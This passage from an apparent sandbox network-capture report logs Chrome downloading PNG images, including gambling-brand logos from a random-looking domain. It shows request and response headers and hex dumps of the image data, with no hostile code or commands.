                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:10 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/png
                                          Content-Length: 21808
                                          Last-Modified: Fri, 04 Oct 2024 20:16:00 GMT
                                          Connection: close
                                          ETag: "67004d00-5530"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:10 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 b4 08 03 00 00 00 f5 b1 d3 e2 00 00 03 00 50 4c 54 45 00 00 00 a8 11 18 b7 1d 24 a7 10 17 dc 39 40 dc 39 40 ac 11 17 b7 1c 24 9a 07 11 a8 11 18 da 37 3d ba 1e 22 b5 18 1f 9f 08 10 a1 0b 13 e2 3c 44 cc 2d 36 cb 29 32 ce 30 37 a6 0b 0f d9 37 3f b3 14 1e e4 3f 46 b6 1c 22 aa 16 1e d7 35 3e e0 3a 42 b2 1c 22 bf 23 28 b2 15 19 d4 32 3c d5 31 38 e6 40 4a a9 0e 12 b0 13 15 aa 09 11 be 1f 24 b6 1b 1e db 38 41 c1 25 2d bc 21 29 a3 0a 0e b0 1b 1f c9 28 2e b5 21 24 ba 1f 26 a7 15 1c b9 1a 1f 9c 0a 11 ac 10 15 e7 41 48 c2 22 28 ae 17 1e d1 2e 36 b4 16 1b d1 32 3b ce 2d 34 c6 27 2e bb 22 23 a4 0a 13 b7 20 29 c6 29 32 d4 2e 35 d2 2f 39 b0 0f 19 c4 23 2c e8 42 4b c8 2d 31 be 28 2e a6 0f 12 dd 38 41 ce
                                          Data Ascii: PNGIHDRPLTE$9@9@$7="<D-6)2077??F"5>:B"#(2<18@J$8A%-!)(.!$&AH"(.62;-4'."# ))2.5/9#,BK-1(.8A
                                          2025-01-12 00:17:10 UTC5770INData Raw: 7e d5 a3 92 24 59 76 38 6c 3e c7 39 c1 60 79 03 19 fd 07 c0 6e 18 34 82 4b 83 92 85 d6 b5 1f 8e ab 71 35 5a 88 f3 6a a8 60 74 bb 2d ce 51 b3 71 27 08 a9 e7 12 bd 5c 30 98 eb 66 77 56 b6 79 d0 bd 20 0a 32 c9 c9 b2 58 5f 5e c9 1e d9 4a 04 4d e3 0b fe 9b 1c a2 35 b6 ab 69 4a bf 8c 14 8a 82 ef fd c5 3b 1e 93 0f f2 56 fa d3 d3 9f 3f 71 dc 52 10 b3 11 9b 0e 4c 4d 4f 3f 61 1b 72 0c 75 70 44 ab 63 bb 34 aa 6e 73 22 21 3f b5 85 0b f8 9d b2 f8 37 00 88 21 d3 c8 80 60 12 00 fe 45 30 b0 50 27 70 cc 18 2d 97 dd ae 3c 4c 0b f1 de e8 f2 7c 48 8d d7 52 06 2b ac 66 5e 57 16 94 c3 07 83 02 38 bd 74 a0 8a 64 53 12 09 0e 82 26 09 92 10 e1 49 d0 af 96 68 96 c5 b7 5d 11 28 4e 94 48 33 08 11 55 d0 3d 86 30 25 65 02 c7 47 08 8c b1 dc ab 56 ab 24 96 c4 72 95 c3 4a a5 d7 eb 5d 81
                                          Data Ascii: ~$Yv8l>9`yn4Kq5Zj`t-Qq'\0fwVy 2X_^JM5iJ;V?qRLMO?arupDc4ns"!?7!`E0P'p-<L|HR+f^W8tdS&Ih](NH3U=0%eGV$rJ]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          104192.168.2.449856154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC401OUTGET /__local/0/D8/B4/2A6083AF30532CABE26DE75AE3C_48A88581_1249E8.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:10 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/png
                                          Content-Length: 1198568
                                          Last-Modified: Fri, 10 Jan 2025 07:04:28 GMT
                                          Connection: close
                                          ETag: "6780c67c-1249e8"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:10 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 f5 00 00 02 ca 08 02 00 00 00 d5 b9 f3 e1 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 20 00 49 44 41 54 78 9c 8c bc 77 8f 24 c9 95 27 f8 9e 09 97 a1 45 ea ac 2c d1 55 dd 14 c3 e1 0c c8 39 2e 16 38 cc 7d ed c3 2d b0 8b 5d 1c 86 c7 9b 9d 59 8a ee 26 bb 4b 66 56 8a d0 c2 b5 89 77 7f bc 88 a8 ac 22 07 38 af 86 b7 a7 bb 87 bb b9 c9 f7 13 66 f8 bb 7f f9 ef 44 64 ad f5 de 2b 81 61 18 22 a2 73 0e c9 21 22 78 22 22 44 12 42 10 91 03 67 81 3c 7a 22 24 22 f4 44 44 e0 81 88 02 a9 00 00 49 1c f6 44 44 e8 55 a0 49 10 3c da 10 11 00 9c 73 f0 b7 36 42 be 19 f9 09 87 f3 ce 12 ff 56 08 21 84 40 44 21 14 70 fa c0 11 6f 1e bd f7 fc 43 44 f9 e8 75 82 5f 0a e0 b5 da 25 6d 7f 71 77 b5 a9 2d 00 20
                                          Data Ascii: PNGIHDRpHYs!! IDATxw$'E,U9.8}-]Y&KfVw"8fDd+a"s!"x""DBg<z"$"DDIDDUI<s6BV!@D!poCDu_%mqw-
                                          2025-01-12 00:17:10 UTC16384INData Raw: 4c 42 08 2f 5f 7f 91 8e c7 03 ea cf 3f fd 75 bb b9 12 cd 57 bb 9b bf fc f9 bf f6 dd a8 56 7e f5 ab 2f ef 1f 3e 4b b1 7e 88 2f 5e dc 1c 0f f7 47 a3 10 e9 ea 6a 7b d8 df 11 85 ed a6 23 0a 87 fd 5d 8c fd f5 d5 78 7b 73 75 3c ee f7 fb f4 f2 c5 55 f7 e5 eb 52 52 29 3a 0c a1 eb 86 69 3a 00 90 bf c1 10 88 28 e4 3c c7 d8 33 e3 30 6c 98 f1 f3 e7 7b 33 89 b1 07 d0 e3 71 7e f1 e2 6a bb bd ba bf ff 3c 0c 9b cd a6 db ed ae 01 54 c4 fe ee ef 7e 4b 14 a6 e9 e0 e3 01 91 0f 87 47 33 03 d4 c0 1d 07 44 e0 5f eb 37 2a 00 a8 25 eb 76 37 a6 b9 0c 63 f7 f9 d3 fd ee 6a 33 4f d9 73 c6 98 39 c6 1e d1 72 96 52 12 d1 eb df fd ee 37 66 98 f3 bc dd 5e a5 34 dd de be f4 be bd bb fb d4 f7 63 29 69 b3 d9 bd 7e fd e2 cd 9b b7 39 cf cc f1 fa 7a c3 1c 73 9e 53 2a ff f6 df fe 8f 87 c3 84 68
                                          Data Ascii: LB/_?uWV~/>K~/^Gj{#]x{su<URR):i:(<30l{3q~j<T~KG3D_7*%v7cj3Os9rR7f^4c)i~9zsS*h
                                          2025-01-12 00:17:10 UTC16384INData Raw: 53 d5 9c 41 55 a7 d3 f1 3c a3 7c b5 13 29 62 e7 38 32 35 5e cd 4f 6f 4d 05 b9 40 ad 0c e8 be 63 5d fa f3 a2 f7 b4 c8 7a 47 6e 52 2b 72 0a 85 0a a1 a8 12 62 2d 43 8a 48 1e 64 40 a7 21 00 30 cf 4c a5 62 0a 4b 9c 7c fd 6a 5a 32 d6 20 1c b4 0b 00 58 ca d5 5f ee 5c 65 9e d6 9d bf fe 02 c0 e5 26 68 66 7d df 9f 8d a5 33 fa 86 53 72 5c 27 56 1d a1 e6 67 60 8c 0c d5 69 62 0b 13 18 aa 13 f5 59 33 11 cf fc 11 8b 1e 60 06 86 04 aa e6 d6 7b 60 ac 9f 7a e0 d7 95 14 93 45 e9 f7 ac 19 30 13 44 40 b0 92 f3 13 3f e3 a2 eb 0c 7d bf 8e d9 b6 28 ae 63 fd 80 b1 05 80 b1 22 79 1c b6 89 a6 02 86 60 e2 fe 05 b7 09 7e 68 37 b9 10 c5 eb 3e f4 23 fc b7 7f f8 27 ff db 34 4d 29 a5 22 f3 7e bf 7f ff fe fd 7e bf 8f b1 42 64 55 15 40 fb 61 df 08 be 97 9b d6 00 be 81 cd f3 9c 36 db be ef
                                          Data Ascii: SAU<|)b825^OoM@c]zGnR+rb-CHd@!0LbK|jZ2 X_\e&hf}3Sr\'Vg`ibY3`{`zE0D@?}(c"y`~h7>#'4M)"~~BdU@a6
                                          2025-01-12 00:17:10 UTC16384INData Raw: 39 1e 8f d6 66 cd b6 c4 1c 63 06 80 2a c6 29 2b 52 6b d2 f7 7d ea f2 34 4d c8 01 91 87 4d 88 49 a7 a6 a2 0f a5 34 03 ae 62 0d 6c 91 9b 7e 92 97 bb 7a f1 c5 76 bb 7d f5 e6 50 de 1c cc ac 94 76 2e 15 00 c6 f2 8e 63 64 b4 71 1c 73 0a a0 da a5 f0 d5 57 5f ed af 6e ae 6e 6e ba 94 ca 78 72 ff 16 a4 11 11 a5 bc ee 11 aa 5a 6b f5 02 45 37 58 2f 43 72 10 01 00 42 0e 33 c2 8b d0 14 59 14 39 73 2e ff cf 7f fe 7b 47 76 18 90 aa 35 53 c7 1e ff e8 8b 4f bb ed 4e 8e e7 f7 df fd d6 a7 41 6b 1a 23 af 39 96 18 b9 8b 1d e7 2e f6 db 14 98 b5 11 3c 86 02 d7 a9 ed 2b cc a5 87 80 e8 9b 6b 51 34 70 f6 63 e0 aa d6 aa 36 d5 e1 d5 f7 33 7e 07 08 5c 65 0e 18 c9 a6 3a a5 14 6c 9a 62 bf 29 7a c4 18 87 fd cd c3 b9 9c 8e 4f f8 6c dc e8 37 b3 69 1c 3d 27 c0 60 39 e7 61 e0 d4 0f bb fd 3e
                                          Data Ascii: 9fc*)+Rk}4MMI4bl~zv}Pv.cdqsW_nnnxrZkE7X/CrB3Y9s.{Gv5SONAk#9.<+kQ4pc63~\e:lb)zOl7i='`9a>
                                          2025-01-12 00:17:10 UTC16384INData Raw: 23 a9 29 00 9a 66 95 24 2a de c6 d2 20 81 29 82 39 e4 88 03 05 04 35 23 26 60 42 c4 ac e2 a1 17 df af c5 bc 42 35 f3 7e 61 e5 5c 13 80 5a 61 86 5b 68 d1 68 51 64 f6 24 b3 77 31 ff c5 6a 34 13 32 04 50 32 02 50 76 57 4b d4 4c 2c 8b 6a 66 40 66 24 0b 08 88 90 9a 2a ee 36 cd 38 74 ce ed c1 01 45 d2 f9 ed 33 7b 04 f3 5c 9f 4e c0 9e 0c 9c 1d 9e 13 d9 b2 ab ec 73 b9 c1 99 1d de c3 fd 0b b0 d6 23 f7 e3 38 22 e2 66 b3 71 f2 fa aa ae 4b 5a 52 55 93 a2 da 63 92 61 18 bc 7e c6 9c 67 62 3e 5c 7f d4 f0 83 b9 4c de 2f 2a 2f c6 73 b0 fa 7a 29 ca 25 e3 d0 77 2c 19 dd 35 66 e6 fc 11 3f 78 76 fe e0 b1 ba d8 eb e5 87 eb ef 8b f1 84 88 d3 34 8d 29 7b 4d ec 62 14 02 47 00 60 8e c8 84 c2 62 8a 82 f5 26 9a 85 50 45 52 76 4e 4b 31 b5 9c 93 4a 08 81 22 31 96 3e 3f 0c e0 8e c7 f1
                                          Data Ascii: #)f$* )95#&`BB5~a\Za[hhQd$w1j42P2PvWKL,jf@f$*68tE3{\Ns#8"fqKZRUca~gb>\L/*/sz)%w,5f?xv4){MbG`b&PERvNK1J"1>?
                                          2025-01-12 00:17:10 UTC16384INData Raw: d5 52 58 06 a8 61 81 ba 22 f6 f6 c3 0b a5 43 d8 ea 86 88 48 8d 2a 89 ec 75 25 42 f5 10 1a 1f 12 51 f0 c6 51 06 92 e5 6a a5 22 54 56 7a bf 63 2d f5 0e 3e b6 66 91 bd 5c 45 45 3b ec 4c 4b 8d 02 80 d7 c4 37 a6 22 f3 9c b6 13 1a 7a 7b 1f cb 2a 4e cb 2a 0a 46 56 24 49 d5 0e 35 27 d6 70 d4 2f 2c 61 4f db 92 a7 70 9b 71 e9 df b5 9b ee e2 dd 34 92 80 81 03 52 06 2f 34 6a 6d b7 5d 6c 2a 38 d1 cc 72 29 cb b2 58 4a 34 cc 6a e8 5b ad 75 7a ff b6 f7 75 b0 ae 37 31 c2 4a d5 d8 ba 9b dd ac 8b 56 6c 6b 62 26 95 d5 cf 94 a8 8e c4 4c 54 55 34 43 09 ed 2e e3 ed 25 23 00 e4 75 23 22 d3 02 00 8e 5d 8a 1c 22 07 55 73 b2 20 73 3e 63 67 46 13 db 4a f6 9e a1 7e 17 9c 7f 36 c6 ba e2 ea b5 50 00 20 27 45 44 26 02 92 da bb c1 49 c8 3c 83 5a 97 b2 79 3c ab f5 d9 46 dd 65 47 8d f6 80
                                          Data Ascii: RXa"CH*u%BQQj"TVzc->f\EE;LK7"z{*N*FV$I5'p/,aOpq4R/4jm]l*8r)XJ4j[uzu71JVlkb&LTU4C.%#u#"]"Us s>cgFJ~6P 'ED&I<Zy<FeG
                                          2025-01-12 00:17:10 UTC16384INData Raw: bd b6 55 44 9a e2 ac 9a d4 93 a8 8a 81 b7 12 13 d1 c3 c3 83 aa 32 10 9c 73 4c 12 63 9c a7 39 ce b5 33 bb 91 bc 77 a8 2a c0 40 52 21 2a 62 4c 65 4a 94 91 77 bb fe 70 98 63 22 c5 8f 3f ff 83 fa 8a 3a 74 94 a1 80 33 d0 5a 5d 71 b2 c4 ce 87 1c e9 b1 7d af 15 92 5d 52 06 0c b7 0c 1a 55 1d 86 0e d8 b1 e7 4c a5 d6 21 23 4e 55 bd cc 93 83 2e e6 45 6a 33 d5 55 45 35 ce 8b f9 a8 92 8a 23 06 53 5a e2 34 5f 58 85 6b 05 41 94 32 0d 04 24 21 ef ba 6e 18 86 c1 31 bb 99 d4 0b 00 e7 ef e0 48 dd ab 0f 64 ad a4 3d c5 5a b9 c7 25 16 e5 7c 99 9d ff 30 f4 21 78 02 d6 7c 04 65 f2 c4 42 f0 c4 8b a4 43 d7 4f 71 39 f6 c3 65 9e 86 d0 2d 92 1e 1e 9e a0 20 90 b1 e0 15 3f b9 86 ce da 9f 3f fb d9 cf 7e f2 93 9f fc e9 9f fe a9 a5 b9 db a1 31 1d bb ce ec 24 20 6a b3 3d e3 b2 b4 96 b3 62
                                          Data Ascii: UD2sLc93w*@R!*bLeJwpc"?:t3Z]q}]RUL!#NU.Ej3UE5#SZ4_XkA2$!n1Hd=Z%|0!x|eBCOq9e- ??~1$ j=b
                                          2025-01-12 00:17:10 UTC16384INData Raw: 81 1c 23 93 44 2d 22 59 8a d3 20 a0 08 64 81 81 b9 12 63 ad 7b 80 93 9c 57 23 35 61 63 1d b2 bd 4d 55 09 d8 b9 e0 5c b2 9d 75 1c 47 53 71 4a 29 db ed 56 44 8c 16 cb 40 6e 86 c2 55 55 4b b7 5b af 2f 82 f3 39 e7 fd 70 38 0c c3 90 4b 97 32 22 02 b9 ed ee 90 c7 a1 0d 21 90 03 2a 9a 4b 01 99 86 71 e2 00 d5 e3 62 16 90 5c 8c 92 5c 4b 29 92 0a 28 22 ae da f5 28 90 14 63 12 74 08 05 32 a8 68 89 25 7b e2 58 14 50 c7 a2 5c 4a 52 dc b8 26 34 bd 02 9b e4 21 a2 94 95 44 44 4a ce 42 44 a5 08 11 94 02 f3 0c 0e ec 1b 15 4b 94 c7 b9 28 b1 53 d5 a6 e9 4a 29 73 e4 89 4c b9 b2 36 4f 89 1a 8c 5b 28 02 c0 9b 37 6f c6 71 dc 6c 36 57 57 2f 54 d5 16 8f 23 cc 39 02 61 e8 da ae 5f 67 19 b2 a8 8a 26 51 62 04 65 b5 3c 08 cb 49 55 02 80 82 98 81 56 fd aa bf b8 f2 f7 5b 24 f2 ec 55 b5
                                          Data Ascii: #D-"Y dc{W#5acMU\uGSqJ)VD@nUUK[/9p8K2"!*Kqb\\K)("(ct2h%{XP\JR&4!DDJBDK(SJ)sL6O[(7oql6WW/T#9a_g&Qbe<IUV[$U
                                          2025-01-12 00:17:10 UTC16384INData Raw: 63 b2 75 5d 8b f5 ef 7d f0 71 df 0d a5 1b 64 8a 70 13 22 18 8d 62 03 03 80 0b 8e 25 3b 42 6b f0 7c bd 22 eb 8c 71 15 12 00 0e fb fd b7 bf fd e6 ee ea 6a b3 58 02 c0 78 e8 1a ef f5 20 77 75 e3 8f 3c 3d 22 c2 b1 54 64 5d dd 60 61 34 68 bc 2b cc 05 e4 d9 93 a7 ff ec bf fc af 2e 9e 7d f0 dd f7 df 87 aa a9 9a 45 ce ec 82 1f ba 83 5a a5 47 5c 5c 06 00 e7 5c 5d d7 37 37 37 5d d7 4d 48 57 e6 9c 33 83 a0 35 39 67 91 62 91 48 eb 45 59 3c e1 cb ef 9e 1b 56 e7 56 50 4d 70 00 01 ea c7 38 6f 4d 7c 52 e0 77 ea ef a1 a2 de 59 00 d9 00 5a 41 c3 98 73 e1 22 ab 76 fd f4 e9 d3 7e 88 ed 72 cd 04 0c 53 b5 18 4f e5 9d 60 4d 05 40 d2 75 29 25 01 ab 4a 73 00 38 a4 84 39 4a 29 b1 8b fb db 9b ed cd 6d 4e a3 35 c4 29 22 f0 e9 ce a9 5d ea ba 0e 4f da bd f9 c8 39 e7 1c ea ba 1b c6 ba
                                          Data Ascii: cu]}qdp"b%;Bk|"qjXx wu<="Td]`a4h+.}EZG\\\]777]MHW359gbHEY<VVPMp8oM|RwYZAs"v~rSO`M@u)%Js89J)mN5)"]O9
                                          2025-01-12 00:17:10 UTC16384INData Raw: fa 8a 21 b5 7d 7f 38 82 51 25 5d 45 98 f6 82 fd e6 50 67 34 21 19 4e c6 a2 36 69 1b 90 88 d4 c2 29 56 76 19 9a 94 cf 45 4c 89 71 8e 6f 0d a9 f6 8a 11 58 a5 9f c9 39 87 10 8a c2 e3 37 df ae f2 a1 fb 67 77 ff 02 15 40 19 d5 13 53 1e 6b 7e 24 27 41 6f b5 3d 14 51 ab c5 df ab 89 e0 9c fd e4 a9 bb 1d bd 0b 6d bb 7c fb ed 77 93 41 02 cc 06 05 08 90 0d 19 c9 bc a9 e4 11 11 63 8c 67 67 55 97 cb 3f 7e fc 66 45 d4 1f de 52 00 30 13 f2 d4 f7 fd 7a b9 40 50 07 56 61 e1 ce b9 9c ee e3 db 9a cf aa 1b e2 eb 19 f1 60 ff 7e 98 eb c0 aa ea 9c 03 05 98 c4 54 b1 88 d5 9d f5 c1 83 07 e0 48 0c 9b c5 52 c5 04 8c c8 89 64 52 35 c9 21 84 fa a0 2b e4 a4 f1 cd d1 f2 e8 a5 ad d0 cc 04 24 2c da 9c c7 06 39 30 07 9b 88 24 86 ae 7f e1 94 b4 d6 89 27 86 c4 99 6a 14 01 66 95 7a 30 22 52
                                          Data Ascii: !}8Q%]EPg4!N6i)VvELqoX97gw@Sk~$'Ao=Qm|wAcggU?~fER0z@PVa`~THRdR5!+$,90$'jfz0"R


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          105192.168.2.449857122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC362OUTGET /imgs/188jinbaobo.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:10 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:10 GMT
                                          Content-Type: image/png
                                          Content-Length: 4303
                                          Last-Modified: Tue, 01 Oct 2024 15:31:11 GMT
                                          Connection: close
                                          ETag: "66fc15bf-10cf"
                                          Expires: Tue, 11 Feb 2025 00:17:10 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:10 UTC4303INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 16 50 4c 54 45 00 00 00 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 ff 92 00 59 59 59 59 59 59 59 59 59 ff 92 00 59 59 59 ff 92 00 59 59 59 ff 92 00 59 59 59 59 59 59 ff 92 00 ff 92 00 59 59 59 ff 9d 23 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 93 00 59 59 59 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff
                                          Data Ascii: PNGIHDR2PLTEYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY#YYYYYYYYYYYYYYYYYYYYYYYYYYY


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          106192.168.2.449858122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC607OUTGET /imgs/bwin.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:10 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:10 GMT
                                          Content-Type: image/png
                                          Content-Length: 5376
                                          Last-Modified: Fri, 04 Oct 2024 20:16:00 GMT
                                          Connection: close
                                          ETag: "67004d00-1500"
                                          Expires: Tue, 11 Feb 2025 00:17:10 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:10 UTC5376INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 4f 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0d 0c 0c 09 08 09 03 03 02 ff e9 0e ff ed 0f de de de ff d4 0d ff ce 0d ff d1 0d ff d9 0d ff d3 0d 24 24 24 ff d6 0d ff df 0d 0a 08 00 fd fc fe bf be bf 1f 1f 1f ff e3 0e ff e6 0e 2d 25 02 32 32 32 ff e1 0e ff f0 0f 94 93 94 93 77 07 b2 90 09 10 0f 10 a4 a4 a6 2a 2a 2b 13 11 10 09 07 06 75 5f 06 33 28 02 f2 f2 f3 88 85 86 5e 5e 5e e1 b6 0b d2 aa 0b fa fa fa 18 17 17 15 15 15 ff cc 0d e2 e2 e2 38 2d 02 bb b9 bb 4e 4d 4e ff db 0d 1d 1b 19 cc a6 0a e6 e4 ee e5
                                          Data Ascii: PNGIHDR2OPLTE$$$-%222w**+u_3(^^^8-NMN


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          107192.168.2.449859122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC609OUTGET /imgs/yongli.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:10 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:10 GMT
                                          Content-Type: image/png
                                          Content-Length: 7076
                                          Last-Modified: Tue, 01 Oct 2024 15:31:18 GMT
                                          Connection: close
                                          ETag: "66fc15c6-1ba4"
                                          Expires: Tue, 11 Feb 2025 00:17:10 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:10 UTC7076INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 85 50 4c 54 45 00 00 00 a2 85 78 93 72 63 9e 82 74 90 70 61 7f 60 4f 5f 3d 2e 79 52 3f 8d 6e 60 7f 5b 4b 49 24 1a 65 3b 24 9e 83 75 ac 92 85 5d 2f 13 74 4a 33 98 74 64 86 67 58 a4 82 71 ac 8a 7f 44 0c 00 67 39 1b 75 54 47 5b 27 0b 5f 33 1a 4e 29 1b 5d 32 1b 8b 66 55 8f 69 55 82 55 40 7a 52 42 59 36 19 6f 46 2e 6c 46 33 8e 71 61 80 5b 4b 60 35 1f 79 50 3a 8e 6b 5b 79 57 46 5a 30 1d 67 40 31 5d 31 10 7a 54 43 59 34 1c 5e 29 12 70 41 1b 62 36 23 7c 58 45 9d 7d 6d 68 40 2e 66 3c 24 6b 42 2c 81 60 51 a6 90 83 90 6d 5a 7c 5d 4f 3c 08 06 5c 2a 13 7a 55 40 5f 39 24 7f 51 3b 3a 0d 02 88 67 57 72 46 32 9b 7d 6c 66 41 31 63 34 14 63 37 1d 51 23 0b 63 36 20 87
                                          Data Ascii: PNGIHDR2PLTExrctpa`O_=.yR?n`[KI$e;$u]/tJ3tdgXqDg9uTG['_3N)]2fUiUU@zRBY6oF.lF3qa[K`5yP:k[yWFZ0g@1]1zTCY4^)pAb6#|XE}mh@.f<$kB,`QmZ|]O<\*zU@_9$Q;:gWrF2}lfA1c4c7Q#c6


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          108192.168.2.449860122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:09 UTC356OUTGET /imgs/weide.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:10 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:10 GMT
                                          Content-Type: image/png
                                          Content-Length: 5294
                                          Last-Modified: Fri, 04 Oct 2024 20:16:01 GMT
                                          Connection: close
                                          ETag: "67004d01-14ae"
                                          Expires: Tue, 11 Feb 2025 00:17:10 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
